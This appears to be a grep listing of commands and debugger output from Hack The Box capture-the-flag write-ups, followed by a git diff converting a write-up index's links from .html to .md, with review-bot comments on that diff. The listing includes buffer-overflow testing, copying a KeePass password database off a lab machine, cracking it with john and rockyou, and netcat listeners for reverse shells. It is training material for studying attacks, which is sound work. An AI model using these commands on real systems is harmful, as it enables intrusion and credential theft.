- Easy/35.html:$rdx : 0x00007ffff7fad580 → 0x0000000000000000 - Easy/35.html:$rsp : 0x00007fffffffe438 → "paaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaava[...]" - Easy/35.html:$rsi : 0x00000000004052a0 → "aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaaga[...]" - Easy/35.html:$rip : 0x00000000004011ac → <****main+77> ret - Easy/35.html:$r12 : 0x0000000000401070 → <_start+0> xor ebp, ebp - Easy/35.html:$r13 : 0x00007fffffffe510 → 0x0000000000000001 - Easy/35.html: → 0x4011ac <****main+77> ret - Easy/35.html:[#0] 0x4011ac → main() - Easy/35.html:$rcx : 0x00007ffff7edc904 → 0x5477fffff0003d48 ("H="?) - Easy/35.html:$rdx : 0x00007ffff7fad580 → 0x0000000000000000 - Easy/35.html:$rsp : 0x00007fffffffe438 → "paaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaava[...]" - Easy/35.html:$rsi : 0x00000000004052a0 → "aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaaga[...]" - Easy/35.html:$rip : 0x00000000004011ac → <****main+77> ret - Easy/35.html:$r12 : 0x0000000000401070 → <_start+0> xor ebp, ebp - Easy/35.html:$r13 : 0x00007fffffffe510 → 0x0000000000000001 - Easy/35.html: → python -c 'print "X"*128 + "Y"*8 + "Z"*8' - Easy/35.html: $rcx : 0x00007ffff7edc904 → 0x5477fffff0003d48 ("H="?) - Easy/35.html: $rdx : 0x00007ffff7fad580 → 0x0000000000000000 - Easy/35.html: $rsp : 0x00007fffffffe438 → "XXXXXXXXYYYYYYYYZZZZZZZZ" - Easy/35.html: $rsi : 0x00000000004052a0 → "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX[...]" - Easy/35.html: $rip : 0x00000000004011ac → <****main+77> ret - Easy/35.html: $r12 : 0x0000000000401070 → <_start+0> xor ebp, ebp - Easy/35.html: $r13 : 0x00007fffffffe510 → 0x0000000000000001 - Easy/35.html:→ nano exploit.py - Easy/35.html: $rsp : 0x00007fff98990520 → 0x0000000000000001 - Easy/35.html: $rip : 0x00007fd2a202e090 → <_start+0> mov rdi, rsp - Easy/35.html: 0x00007fff98990528│+0x0008: 0x00007fff98992748 → 0x00707061796d2f2e ("./myapp"?) 
- Easy/35.html: 0x00007fff98990538│+0x0018: 0x00007fff98992750 → "APPDIR=/tmp/.mount_tmtxDoJV" - Easy/35.html: 0x00007fff98990540│+0x0020: 0x00007fff9899276c → "APPIMAGE=/tmp/tm" - Easy/35.html: 0x00007fff98990548│+0x0028: 0x00007fff9899277d → "COLORTERM=truecolor" - Easy/35.html: 0x00007fff98990550│+0x0030: 0x00007fff98992791 → "DISPLAY=:0.0" - Easy/35.html: 0x00007fff98990558│+0x0038: 0x00007fff9899279e → "HOME=/root" - Easy/35.html: → 0x7fd2a202e090 <_start+0> mov rdi, rsp - Easy/35.html: [#0] 0x7fd2a202e090 → _start() - Easy/35.html: $rax : 0x000000000040115f → <****main+0> push rbp - Easy/35.html: $rcx : 0x00007fd2a2007718 → 0x00007fd2a2009a40 → 0x0000000000000000 - Easy/35.html: $rdx : 0x00007fff98990538 → 0x00007fff98992750 → "APPDIR=/tmp/.mount_tmtxDoJV" - Easy/35.html: $rsp : 0x00007fff98990440 → 0x00000000004011b0 → <__libc_csu_init+0> push r15 - Easy/35.html: $rbp : 0x00007fff98990440 → 0x00000000004011b0 → <__libc_csu_init+0> push r15 - Easy/35.html: $rsi : 0x00007fff98990528 → 0x00007fff98992748 → 0x00707061796d2f2e ("./myapp"?) - Easy/35.html: $rip : 0x0000000000401163 → <****main+4> sub rsp, 0x70 - Easy/35.html: $r8 : 0x00007fd2a2009a50 → 0x0000000000000004 - Easy/35.html: $r9 : 0x00007fd2a203c780 → <_dl_fini+0> push rbp - Easy/35.html: $r12 : 0x0000000000401070 → <_start+0> xor ebp, ebp - Easy/35.html: $r13 : 0x00007fff98990520 → 0x0000000000000001 - Easy/35.html: 0x00007fff98990440│+0x0000: 0x00000000004011b0 → <__libc_csu_init+0> push r15 ← $rsp, $rbp - Easy/35.html: 0x00007fff98990448│+0x0008: 0x00007fd2a1e74bbb → <__libc_start_main+235> mov edi, eax - Easy/35.html: 0x00007fff98990458│+0x0018: 0x00007fff98990528 → 0x00007fff98992748 → 0x00707061796d2f2e ("./myapp"?) 
- Easy/35.html: 0x00007fff98990468│+0x0028: 0x000000000040115f → <****main+0> push rbp - Easy/35.html: → 0x401163 <****main+4> sub rsp, 0x70 - Easy/35.html: [#0] 0x401163 → main() - Easy/35.html:→ 0x401163 <****main+4> sub rsp, 0x70 - Easy/35.html:→ objdump -D myapp | grep -i system - Easy/35.html: → objdump -D myapp | grep -i test - Easy/35.html: → nano exploit.py - Easy/35.html: → python3 exploit.py - Easy/35.html:→ ssh-keygen -f safe - Easy/35.html:→ chmod 600 safe - Easy/35.html:→ cat safe.pub - Easy/35.html: → scp -i ../Ghidra/safe user@10.10.10.147:MyPasswords.kdbx . - Easy/35.html: → scp -i ../Ghidra/safe user@10.10.10.147:IMG_0547.JPG . - Easy/35.html: → ls - Easy/35.html: → file MyPasswords.kdbx - Easy/35.html: → file IMG_0547.JPG - Easy/35.html:→ /usr/sbin/keepass2john MyPasswords.kdbx | sed "s/MyPasswords/IMG_0547.JPG/g" - Easy/35.html:→ /usr/sbin/keepass2john MyPasswords.kdbx | sed "s/MyPasswords/IMG_0547.JPG/g" > keepass_hash - Easy/35.html: → john -w:/usr/share/wordlists/rockyou.txt keepass_hash - Easy/5.html:**λ nihilist [nihilist/_HTB/Optimum] → nmap -sC -sV 10.10.10.8** - Easy/5.html: **λ root [nihilist/_HTB/Optimum] → nikto -h http://10.10.10.8/** - Easy/5.html: **λ root [nihilist/_HTB/Optimum] → searchsploit rejetto** - Easy/34.html: → nmap -F 10.10.10.115 - Easy/34.html: → nmap -sCV -p22,80 10.10.10.115 - Easy/34.html:→ echo "10.10.10.115 haystack.htb" >> /etc/hosts - Easy/34.html: → dirsearch -u http://10.10.10.115/ -t 50 -e txt,php,html,js - Easy/34.html:→ nikto -h http://haystack.htb/ - Easy/34.html: → curl -sk http://haystack.htb/robots.txt | grep nginx - Easy/34.html: → wget http://haystack.htb/needle.jpg - Easy/34.html: → exiftool needle.jpg - Easy/34.html: → strings needle.jpg - Easy/34.html: → echo "bGEgYWd1amEgZW4gZWwgcGFqYXIgZXMgImNsYXZlIg==" | base64 -d - Easy/34.html: → nmap -F 10.10.10.115 --top-ports 10000 -vvv - Easy/34.html: → nmap -sCV -p9200 10.10.10.115 - Easy/34.html: → curl -sk http://haystack.htb:9200 - Easy/34.html: → curl 
-sk http://haystack.htb:9200/_cat/indices/\?v - Easy/34.html:→ curl -X POST http://haystack.htb:9200/\/_search - Easy/34.html:→ curl -X POST http://haystack.htb:9200/bank/_search - Easy/34.html:→ npm install elasticdump -g - Easy/34.html:→ elasticdump --input=http://10.10.10.115:9200/quotes --output=quotes.json --type=data - Easy/34.html: → cat quotes.json| grep clave - Easy/34.html: → echo "cGFzczogc3BhbmlzaC5pcy5rZXk=" | base64 -d - Easy/34.html: → echo "dXNlcjogc2VjdXJpdHkg" | base64 -d - Easy/34.html: → ssh security@haystack.htb - Easy/34.html:→ nano nihilist.js - Easy/34.html:→ python -m SimpleHTTPServer 8080 - Easy/34.html:→ cat nihilist.js - Easy/34.html:→ nc -lvnp 9001 - Easy/34.html:→ nc -lvnp 9001 - Easy/34.html: → nc -lvnp 9002 - - -`** diff --git a/index.md b/index.md index bce3244..2b4ad96 100644 --- a/index.md +++ b/index.md 
@@ -10,78 +10,78 @@ ##### Hack The Box - Easy Boxes -[ Template Page ](Easy/0.html) +[ Template Page ](Easy/0.md) - 1. [ ✅ - Lame ](Easy/1.html) - 2. [ ✅ - Legacy ](Easy/2.html) - 3. [ ✅ - Devel ](Easy/3.html) - 4. [ ✅ - Beep ](Easy/4.html) - 5. [ ✅ - Optimum ](Easy/5.html) - 6. [ ✅ - Arctic ](Easy/6.html) - 7. [ ✅ - Grandpa ](Easy/7.html) - 8. [ ✅ - Granny ](Easy/8.html) - 9. [ ✅ - Bank ](Easy/9.html) - 10. [ ✅ - Blocky ](Easy/10.html) - 11. [ ✅ - Blue ](Easy/11.html) - 12. [ ✅ - Mirai ](Easy/12.html) - 13. [ ✅ - Shocker ](Easy/13.html) - 14. [ ✅ - Sense ](Easy/14.html) - 15. [ ✅ - Bashed ](Easy/15.html) - 16. [ ✅ - Nibbles ](Easy/16.html) - 17. [ ✅ - Valentine ](Easy/17.html) - 18. [ ✅ - Sunday](Easy/18.html) - 19. [ ✅ - Bounty](Easy/19.html) - 20. [ ✅ - Jerry ](Easy/20.html) - 21. [ ✅ - Active ](Easy/21.html) - 22. [ ✅ - Access ](Easy/22.html) - 23. [ ✅ - Frolic ](Easy/23.html) - 24. [ ✅ - Curling ](Easy/24.html) - 25. [ ✅ - Irked ](Easy/25.html) - 26. [ ✅ - Teacher ](Easy/26.html) - 27. [ ✅ - Help ](Easy/27.html) - 28. [ ✅ - FriendZone ](Easy/28.html) - 29. [ ✅ - Netmon ](Easy/29.html) - 30. [ ✅ - CasaDePapel ](Easy/30.html) - 31. [ ✅ - Bastion ](Easy/31.html) - 32. [ ✅ - SwagShop ](Easy/32.html) - 33. [ ✅ - Writeup ](Easy/33.html) - 34. [ ✅ - Haystack ](Easy/34.html) - 35. [ ✅ - Safe ](Easy/35.html) - 36. [ ✅ - Heist ](Easy/36.html) - 37. [ ✅ - Networked ](Easy/37.html) - 38. [ ✅ - Forest](Easy/38.html) - 39. [ ✅ - Postman](Easy/39.html) - 40. [ ✅ - Traverxec](Easy/40.html) - 41. [ ✅ - OpenAdmin](Easy/41.html) - 42. [ ✅ - Nest](Easy/42.html) - 43. [ ✅ - Traceback](Easy/43.html) - 44. [ ✅ - Remote](Easy/44.html) - 45. [ ✅ - Servmon](Easy/45.html) - 46. [ ✅ - Admirer](Easy/46.html) - 47. [ ✅ - Blunder](Easy/47.html) - 48. [ ✅ - Tabby](Easy/48.html) - 49. [ ✅ - Buff](Easy/49.html) - 50. [ ✅ - Omni](Easy/50.html) - 51. [ ✅ - Doctor](Easy/51.html) - 52. [ ✅ - Academy](Easy/52.html) - 53. [ ✅ - Laboratory](Easy/53.html) - 54. [ ✅ - Luanne](Easy/54.html) - 55. 
[ ✅ - Delivery](Easy/55.html) - 56. [ ✅ - Toolbox](Easy/56.html) - 57. [ ✅ - Sauna](Easy/57.html) - 58. [ ✅ - ScriptKiddie](Easy/58.html) - 59. [ ✅ - Armageddon](Easy/59.html) - 60. [ ✅ - Spectra](Easy/60.html) - 61. [ ✅ - Love](Easy/61.html) - 62. [ ✅ - Cap](Easy/62.html) - 63. [ ✅ - Knife](Easy/63.html) - 64. [ ✅ - Previse](Easy/64.html) - 65. [ ✅ - Paper](Easy/65.html) - 66. [ ✅ - BountyHunter](Easy/66.html) - 67. [ ✅ - Explore](Easy/67.html) - 68. [ ✅ - Horizontall](Easy/68.html) - 69. [ ✅ - Backdoor](Easy/69.html) - 70. [ ✅ - Driver](Easy/70.html) + 1. [ ✅ - Lame ](Easy/1.md) + 2. [ ✅ - Legacy ](Easy/2.md) + 3. [ ✅ - Devel ](Easy/3.md) + 4. [ ✅ - Beep ](Easy/4.md) + 5. [ ✅ - Optimum ](Easy/5.md) + 6. [ ✅ - Arctic ](Easy/6.md) + 7. [ ✅ - Grandpa ](Easy/7.md) + 8. [ ✅ - Granny ](Easy/8.md) + 9. [ ✅ - Bank ](Easy/9.md) + 10. [ ✅ - Blocky ](Easy/10.md) + 11. [ ✅ - Blue ](Easy/11.md) + 12. [ ✅ - Mirai ](Easy/12.md) + 13. [ ✅ - Shocker ](Easy/13.md) + 14. [ ✅ - Sense ](Easy/14.md) + 15. [ ✅ - Bashed ](Easy/15.md) + 16. [ ✅ - Nibbles ](Easy/16.md) + 17. [ ✅ - Valentine ](Easy/17.md) + 18. [ ✅ - Sunday](Easy/18.md) + 19. [ ✅ - Bounty](Easy/19.md) + 20. [ ✅ - Jerry ](Easy/20.md) + 21. [ ✅ - Active ](Easy/21.md) + 22. [ ✅ - Access ](Easy/22.md) + 23. [ ✅ - Frolic ](Easy/23.md) + 24. [ ✅ - Curling ](Easy/24.md) + 25. [ ✅ - Irked ](Easy/25.md) + 26. [ ✅ - Teacher ](Easy/26.md) + 27. [ ✅ - Help ](Easy/27.md) + 28. [ ✅ - FriendZone ](Easy/28.md) + 29. [ ✅ - Netmon ](Easy/29.md) + 30. [ ✅ - CasaDePapel ](Easy/30.md) + 31. [ ✅ - Bastion ](Easy/31.md) + 32. [ ✅ - SwagShop ](Easy/32.md) + 33. [ ✅ - Writeup ](Easy/33.md) + 34. [ ✅ - Haystack ](Easy/34.md) + 35. [ ✅ - Safe ](Easy/35.md) + 36. [ ✅ - Heist ](Easy/36.md) + 37. [ ✅ - Networked ](Easy/37.md) + 38. [ ✅ - Forest](Easy/38.md) + 39. [ ✅ - Postman](Easy/39.md) + 40. [ ✅ - Traverxec](Easy/40.md) + 41. [ ✅ - OpenAdmin](Easy/41.md) + 42. [ ✅ - Nest](Easy/42.md) + 43. [ ✅ - Traceback](Easy/43.md) + 44. 
[ ✅ - Remote](Easy/44.md) + 45. [ ✅ - Servmon](Easy/45.md) + 46. [ ✅ - Admirer](Easy/46.md) + 47. [ ✅ - Blunder](Easy/47.md) + 48. [ ✅ - Tabby](Easy/48.md) + 49. [ ✅ - Buff](Easy/49.md) + 50. [ ✅ - Omni](Easy/50.md) + 51. [ ✅ - Doctor](Easy/51.md) + 52. [ ✅ - Academy](Easy/52.md) + 53. [ ✅ - Laboratory](Easy/53.md) + 54. [ ✅ - Luanne](Easy/54.md) + 55. [ ✅ - Delivery](Easy/55.md) + 56. [ ✅ - Toolbox](Easy/56.md) + 57. [ ✅ - Sauna](Easy/57.md) + 58. [ ✅ - ScriptKiddie](Easy/58.md) + 59. [ ✅ - Armageddon](Easy/59.md) + 60. [ ✅ - Spectra](Easy/60.md) + 61. [ ✅ - Love](Easy/61.md) + 62. [ ✅ - Cap](Easy/62.md) + 63. [ ✅ - Knife](Easy/63.md) + 64. [ ✅ - Previse](Easy/64.md) + 65. [ ✅ - Paper](Easy/65.md) + 66. [ ✅ - BountyHunter](Easy/66.md) + 67. [ ✅ - Explore](Easy/67.md) + 68. [ ✅ - Horizontall](Easy/68.md) + 69. [ ✅ - Backdoor](Easy/69.md) + 70. [ ✅ - Driver](Easy/70.md) 
@@ -162,75 +162,75 @@ ##### Hack The Box - Medium Boxes -[Template Page](Medium/0.html) +[Template Page](Medium/0.md) - 1. [ ✅ - Popcorn](Medium/1.html) - 2. [ ✅ - Bastard](Medium/2.html) - 3. [ ✅ - Tenten](Medium/3.html) - 4. [ ✅ - Cronos](Medium/4.html) - 5. [ ✅ - October](Medium/5.html) - 6. [ ✅ - Lazy](Medium/6.html) - 7. [ ✅ - Sneaky](Medium/7.html) - 8. [ ✅ - Haircut](Medium/8.html) - 9. [ ✅ - Europa](Medium/9.html) - 10. [ ✅ - Nineveh](Medium/10.html) - 11. [ ✅ - Apocalyst](Medium/11.html) - 12. [ ✅ - SolidState](Medium/12.html) - 13. [ ✅ - Node](Medium/13.html) - 14. [ ✅ - Enterprise](Medium/14.html) - 15. [ ✅ - Jeeves](Medium/15.html) - 16. [ ✅ - Inception](Medium/16.html) - 17. [ ✅ - FluxCapacitor](Medium/17.html) - 18. [ ✅ - Chatterbox](Medium/18.html) - 19. [ ✅ - Aragog](Medium/19.html) - 20. [ ✅ - Bart](Medium/20.html) - 21. [ ✅ - Stratosphere](Medium/21.html) - 22. [ ✅ - Celestial](Medium/22.html) - 23. [ ✅ - Silo](Medium/23.html) - 24. [ ✅ - Poison](Medium/24.html) - 25. [ ✅ - Canape](Medium/25.html) - 26. [ ✅ - Olympus](Medium/26.html) - 27. [ ✅ - TartarSauce](Medium/27.html) - 28. [ ✅ - DevOops](Medium/28.html) - 29. [ ✅ - Hawk](Medium/29.html) - 30. [ ✅ - Waldo](Medium/30.html) - 31. [ ✅ - SecNotes](Medium/31.html) - 32. [ ✅ - Giddy](Medium/32.html) - 33. [ ✅ - Ypuffy](Medium/33.html) - 34. [ ✅ - Carrier](Medium/34.html) - 35. [ ✅ - Vault](Medium/35.html) - 36. [ ✅ - Redcross](Medium/36.html) - 37. [ ✅ - Lightweight](Medium/37.html) - 38. [ ✅ - Chaos](Medium/38.html) - 39. [ ✅ - Querier](Medium/39.html) - 40. [ ✅ - Arkham](Medium/40.html) - 41. [ ✅ - Unattended](Medium/41.html) - 42. [ ✅ - Luke](Medium/42.html) - 43. [ ✅ - Jarvis](Medium/43.html) - 44. [ ✅ - Craft](Medium/44.html) - 45. [ ✅ - Bitlab](Medium/45.html) - 46. [ ✅ - Wall](Medium/46.html) - 47. [ ✅ - Json](Medium/47.html) - 48. [ ✅ - AI](Medium/48.html) - 49. [ ✅ - Sniper ](Medium/49.html) - 50. [ ✅ - Mango ](Medium/50.html) - 51. [ ✅ - Obscurity](Medium/51.html) - 52. 
[ ✅ - Monteverde](Medium/52.html) - 53. [ ✅ - Book](Medium/53.html) - 54. [ ✅ - Cascade](Medium/54.html) - 55. [ ✅ - Magic](Medium/55.html) - 56. [ ✅ - Cache](Medium/56.html) - 57. [ ✅ - Fuse](Medium/57.html) - 58. [ ✅ - SneakyMailer](Medium/58.html) - 59. [ ✅ - OpenKeyS](Medium/59.html) - 60. [ ✅ - Worker](Medium/60.html) - 61. [ ✅ - Passage](Medium/61.html) - 62. [ ✅ - Jewel](Medium/62.html) - 63. [ ✅ - Bucket](Medium/63.html) - 64. [ ✅ - Time](Medium/64.html) - 65. [ ✅ - Ready](Medium/65.html) - 66. [ ✅ - Tenet](Medium/66.html) - 67. [ ✅ - Ophiuchi](Medium/67.html) + 1. [ ✅ - Popcorn](Medium/1.md) + 2. [ ✅ - Bastard](Medium/2.md) + 3. [ ✅ - Tenten](Medium/3.md) + 4. [ ✅ - Cronos](Medium/4.md) + 5. [ ✅ - October](Medium/5.md) + 6. [ ✅ - Lazy](Medium/6.md) + 7. [ ✅ - Sneaky](Medium/7.md) + 8. [ ✅ - Haircut](Medium/8.md) + 9. [ ✅ - Europa](Medium/9.md) + 10. [ ✅ - Nineveh](Medium/10.md) + 11. [ ✅ - Apocalyst](Medium/11.md) + 12. [ ✅ - SolidState](Medium/12.md) + 13. [ ✅ - Node](Medium/13.md) + 14. [ ✅ - Enterprise](Medium/14.md) + 15. [ ✅ - Jeeves](Medium/15.md) + 16. [ ✅ - Inception](Medium/16.md) + 17. [ ✅ - FluxCapacitor](Medium/17.md) + 18. [ ✅ - Chatterbox](Medium/18.md) + 19. [ ✅ - Aragog](Medium/19.md) + 20. [ ✅ - Bart](Medium/20.md) + 21. [ ✅ - Stratosphere](Medium/21.md) + 22. [ ✅ - Celestial](Medium/22.md) + 23. [ ✅ - Silo](Medium/23.md) + 24. [ ✅ - Poison](Medium/24.md) + 25. [ ✅ - Canape](Medium/25.md) + 26. [ ✅ - Olympus](Medium/26.md) + 27. [ ✅ - TartarSauce](Medium/27.md) + 28. [ ✅ - DevOops](Medium/28.md) + 29. [ ✅ - Hawk](Medium/29.md) + 30. [ ✅ - Waldo](Medium/30.md) + 31. [ ✅ - SecNotes](Medium/31.md) + 32. [ ✅ - Giddy](Medium/32.md) + 33. [ ✅ - Ypuffy](Medium/33.md) + 34. [ ✅ - Carrier](Medium/34.md) + 35. [ ✅ - Vault](Medium/35.md) + 36. [ ✅ - Redcross](Medium/36.md) + 37. [ ✅ - Lightweight](Medium/37.md) + 38. [ ✅ - Chaos](Medium/38.md) + 39. [ ✅ - Querier](Medium/39.md) + 40. [ ✅ - Arkham](Medium/40.md) + 41. 
[ ✅ - Unattended](Medium/41.md) + 42. [ ✅ - Luke](Medium/42.md) + 43. [ ✅ - Jarvis](Medium/43.md) + 44. [ ✅ - Craft](Medium/44.md) + 45. [ ✅ - Bitlab](Medium/45.md) + 46. [ ✅ - Wall](Medium/46.md) + 47. [ ✅ - Json](Medium/47.md) + 48. [ ✅ - AI](Medium/48.md) + 49. [ ✅ - Sniper ](Medium/49.md) + 50. [ ✅ - Mango ](Medium/50.md) + 51. [ ✅ - Obscurity](Medium/51.md) + 52. [ ✅ - Monteverde](Medium/52.md) + 53. [ ✅ - Book](Medium/53.md) + 54. [ ✅ - Cascade](Medium/54.md) + 55. [ ✅ - Magic](Medium/55.md) + 56. [ ✅ - Cache](Medium/56.md) + 57. [ ✅ - Fuse](Medium/57.md) + 58. [ ✅ - SneakyMailer](Medium/58.md) + 59. [ ✅ - OpenKeyS](Medium/59.md) + 60. [ ✅ - Worker](Medium/60.md) + 61. [ ✅ - Passage](Medium/61.md) + 62. [ ✅ - Jewel](Medium/62.md) + 63. [ ✅ - Bucket](Medium/63.md) + 64. [ ✅ - Time](Medium/64.md) + 65. [ ✅ - Ready](Medium/65.md) + 66. [ ✅ - Tenet](Medium/66.md) + 67. [ ✅ - Ophiuchi](Medium/67.md) @@ -282,7 +282,7 @@ * | Centreon, uncompyle, linpeas, GNU Screen 4.5.0 * | Json.Net deserialization, WS2012 R2 Datacenter * | Speech recognition SQL injection, jdwp - * | RFI, MS Compiled HTML Help + * | RFI, MS Compiled md Help * | MongoDB NoSQL injection, jjs * | Python exec(), file decryption, background processes * | Azure AD Connect exploit PoC 
@@ -308,18 +308,18 @@ ##### Hack The Box - Hard Boxes -[Template Page](Hard/0.html) +[Template Page](Hard/0.md) - 1. [ ✅ - Joker](Hard/1.html) - 2. [ ✅ - Calamity ](Hard/2.html) - 3. [ ✅ - Charon](Hard/3.html) - 4. [ ✅ - Shrek](Hard/4.html) - 5. [ ✅ - Mantis](Hard/5.html) - 6. [ ✅ - Kotarak](Hard/7.html) - 7. [ ✅ - Tally](Hard/6.html) - 8. [ ✅ - CrimeStoppers](Hard/8.html) - 9. [ ✅ - Falafel](Hard/9.html) - 10. [ ✅ - Dropzone](Hard/10.html) + 1. [ ✅ - Joker](Hard/1.md) + 2. [ ✅ - Calamity ](Hard/2.md) + 3. [ ✅ - Charon](Hard/3.md) + 4. [ ✅ - Shrek](Hard/4.md) + 5. [ ✅ - Mantis](Hard/5.md) + 6. [ ✅ - Kotarak](Hard/7.md) + 7. [ ✅ - Tally](Hard/6.md) + 8. [ ✅ - CrimeStoppers](Hard/8.md) + 9. [ ✅ - Falafel](Hard/9.md) + 10. [ ✅ - Dropzone](Hard/10.md) @@ -340,7 +340,7 @@ ##### Recurrent Tricks -[ Template Page ](Easy/0.html) +[ Template Page ](Easy/0.md) 1. [✅ - File transfers ](Tools/files/index.md) 2. [✅ - reverse shells with XC ](Tools/xc/index.md) @@ -357,7 +357,7 @@ ![](concept.png) -# [Binary Exploitation](binexp.html) +# [Binary Exploitation](binexp.md) ![](0.png)
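Review bot: In the index.md hunk at `@@ -282,7 +282,7 @@`, the line `* | RFI, MS Compiled HTML Help` is rewritten to `* | RFI, MS Compiled md Help`, so the .html-to-.md replacement has hit prose rather than a link target. "Compiled HTML Help" is the name of the Microsoft help format, so this line should be restored. Restricting the substitution to link targets (text of the form `](....html)`) would keep it from touching descriptions like this one, and a quick search of the result for a bare "md" inside non-link text would catch any similar hits in the other files.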
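Review bot: In the Hard Boxes hunk at `@@ -308,18 +308,18 @@`, entry 6 (Kotarak) links to `Hard/7.md` and entry 7 (Tally) links to `Hard/6.md`, so list position and file number are swapped for these two. The patch carries this over unchanged from the .html links, which is fine for a pure rename, but since every line of the list is being touched anyway it is worth confirming the targets are the intended ones and reordering the two entries so the numbering matches the files.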
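Review bot: In the Recurrent Tricks hunk at `@@ -340,7 +340,7 @@`, the "Template Page" link still points at `Easy/0.md`, while the entries listed under it live under `Tools/` (for example `Tools/files/index.md`). The rename preserves what looks like a copy-paste from the Easy Boxes section. If the Tools pages have their own template, link that instead; otherwise consider dropping the link from this section.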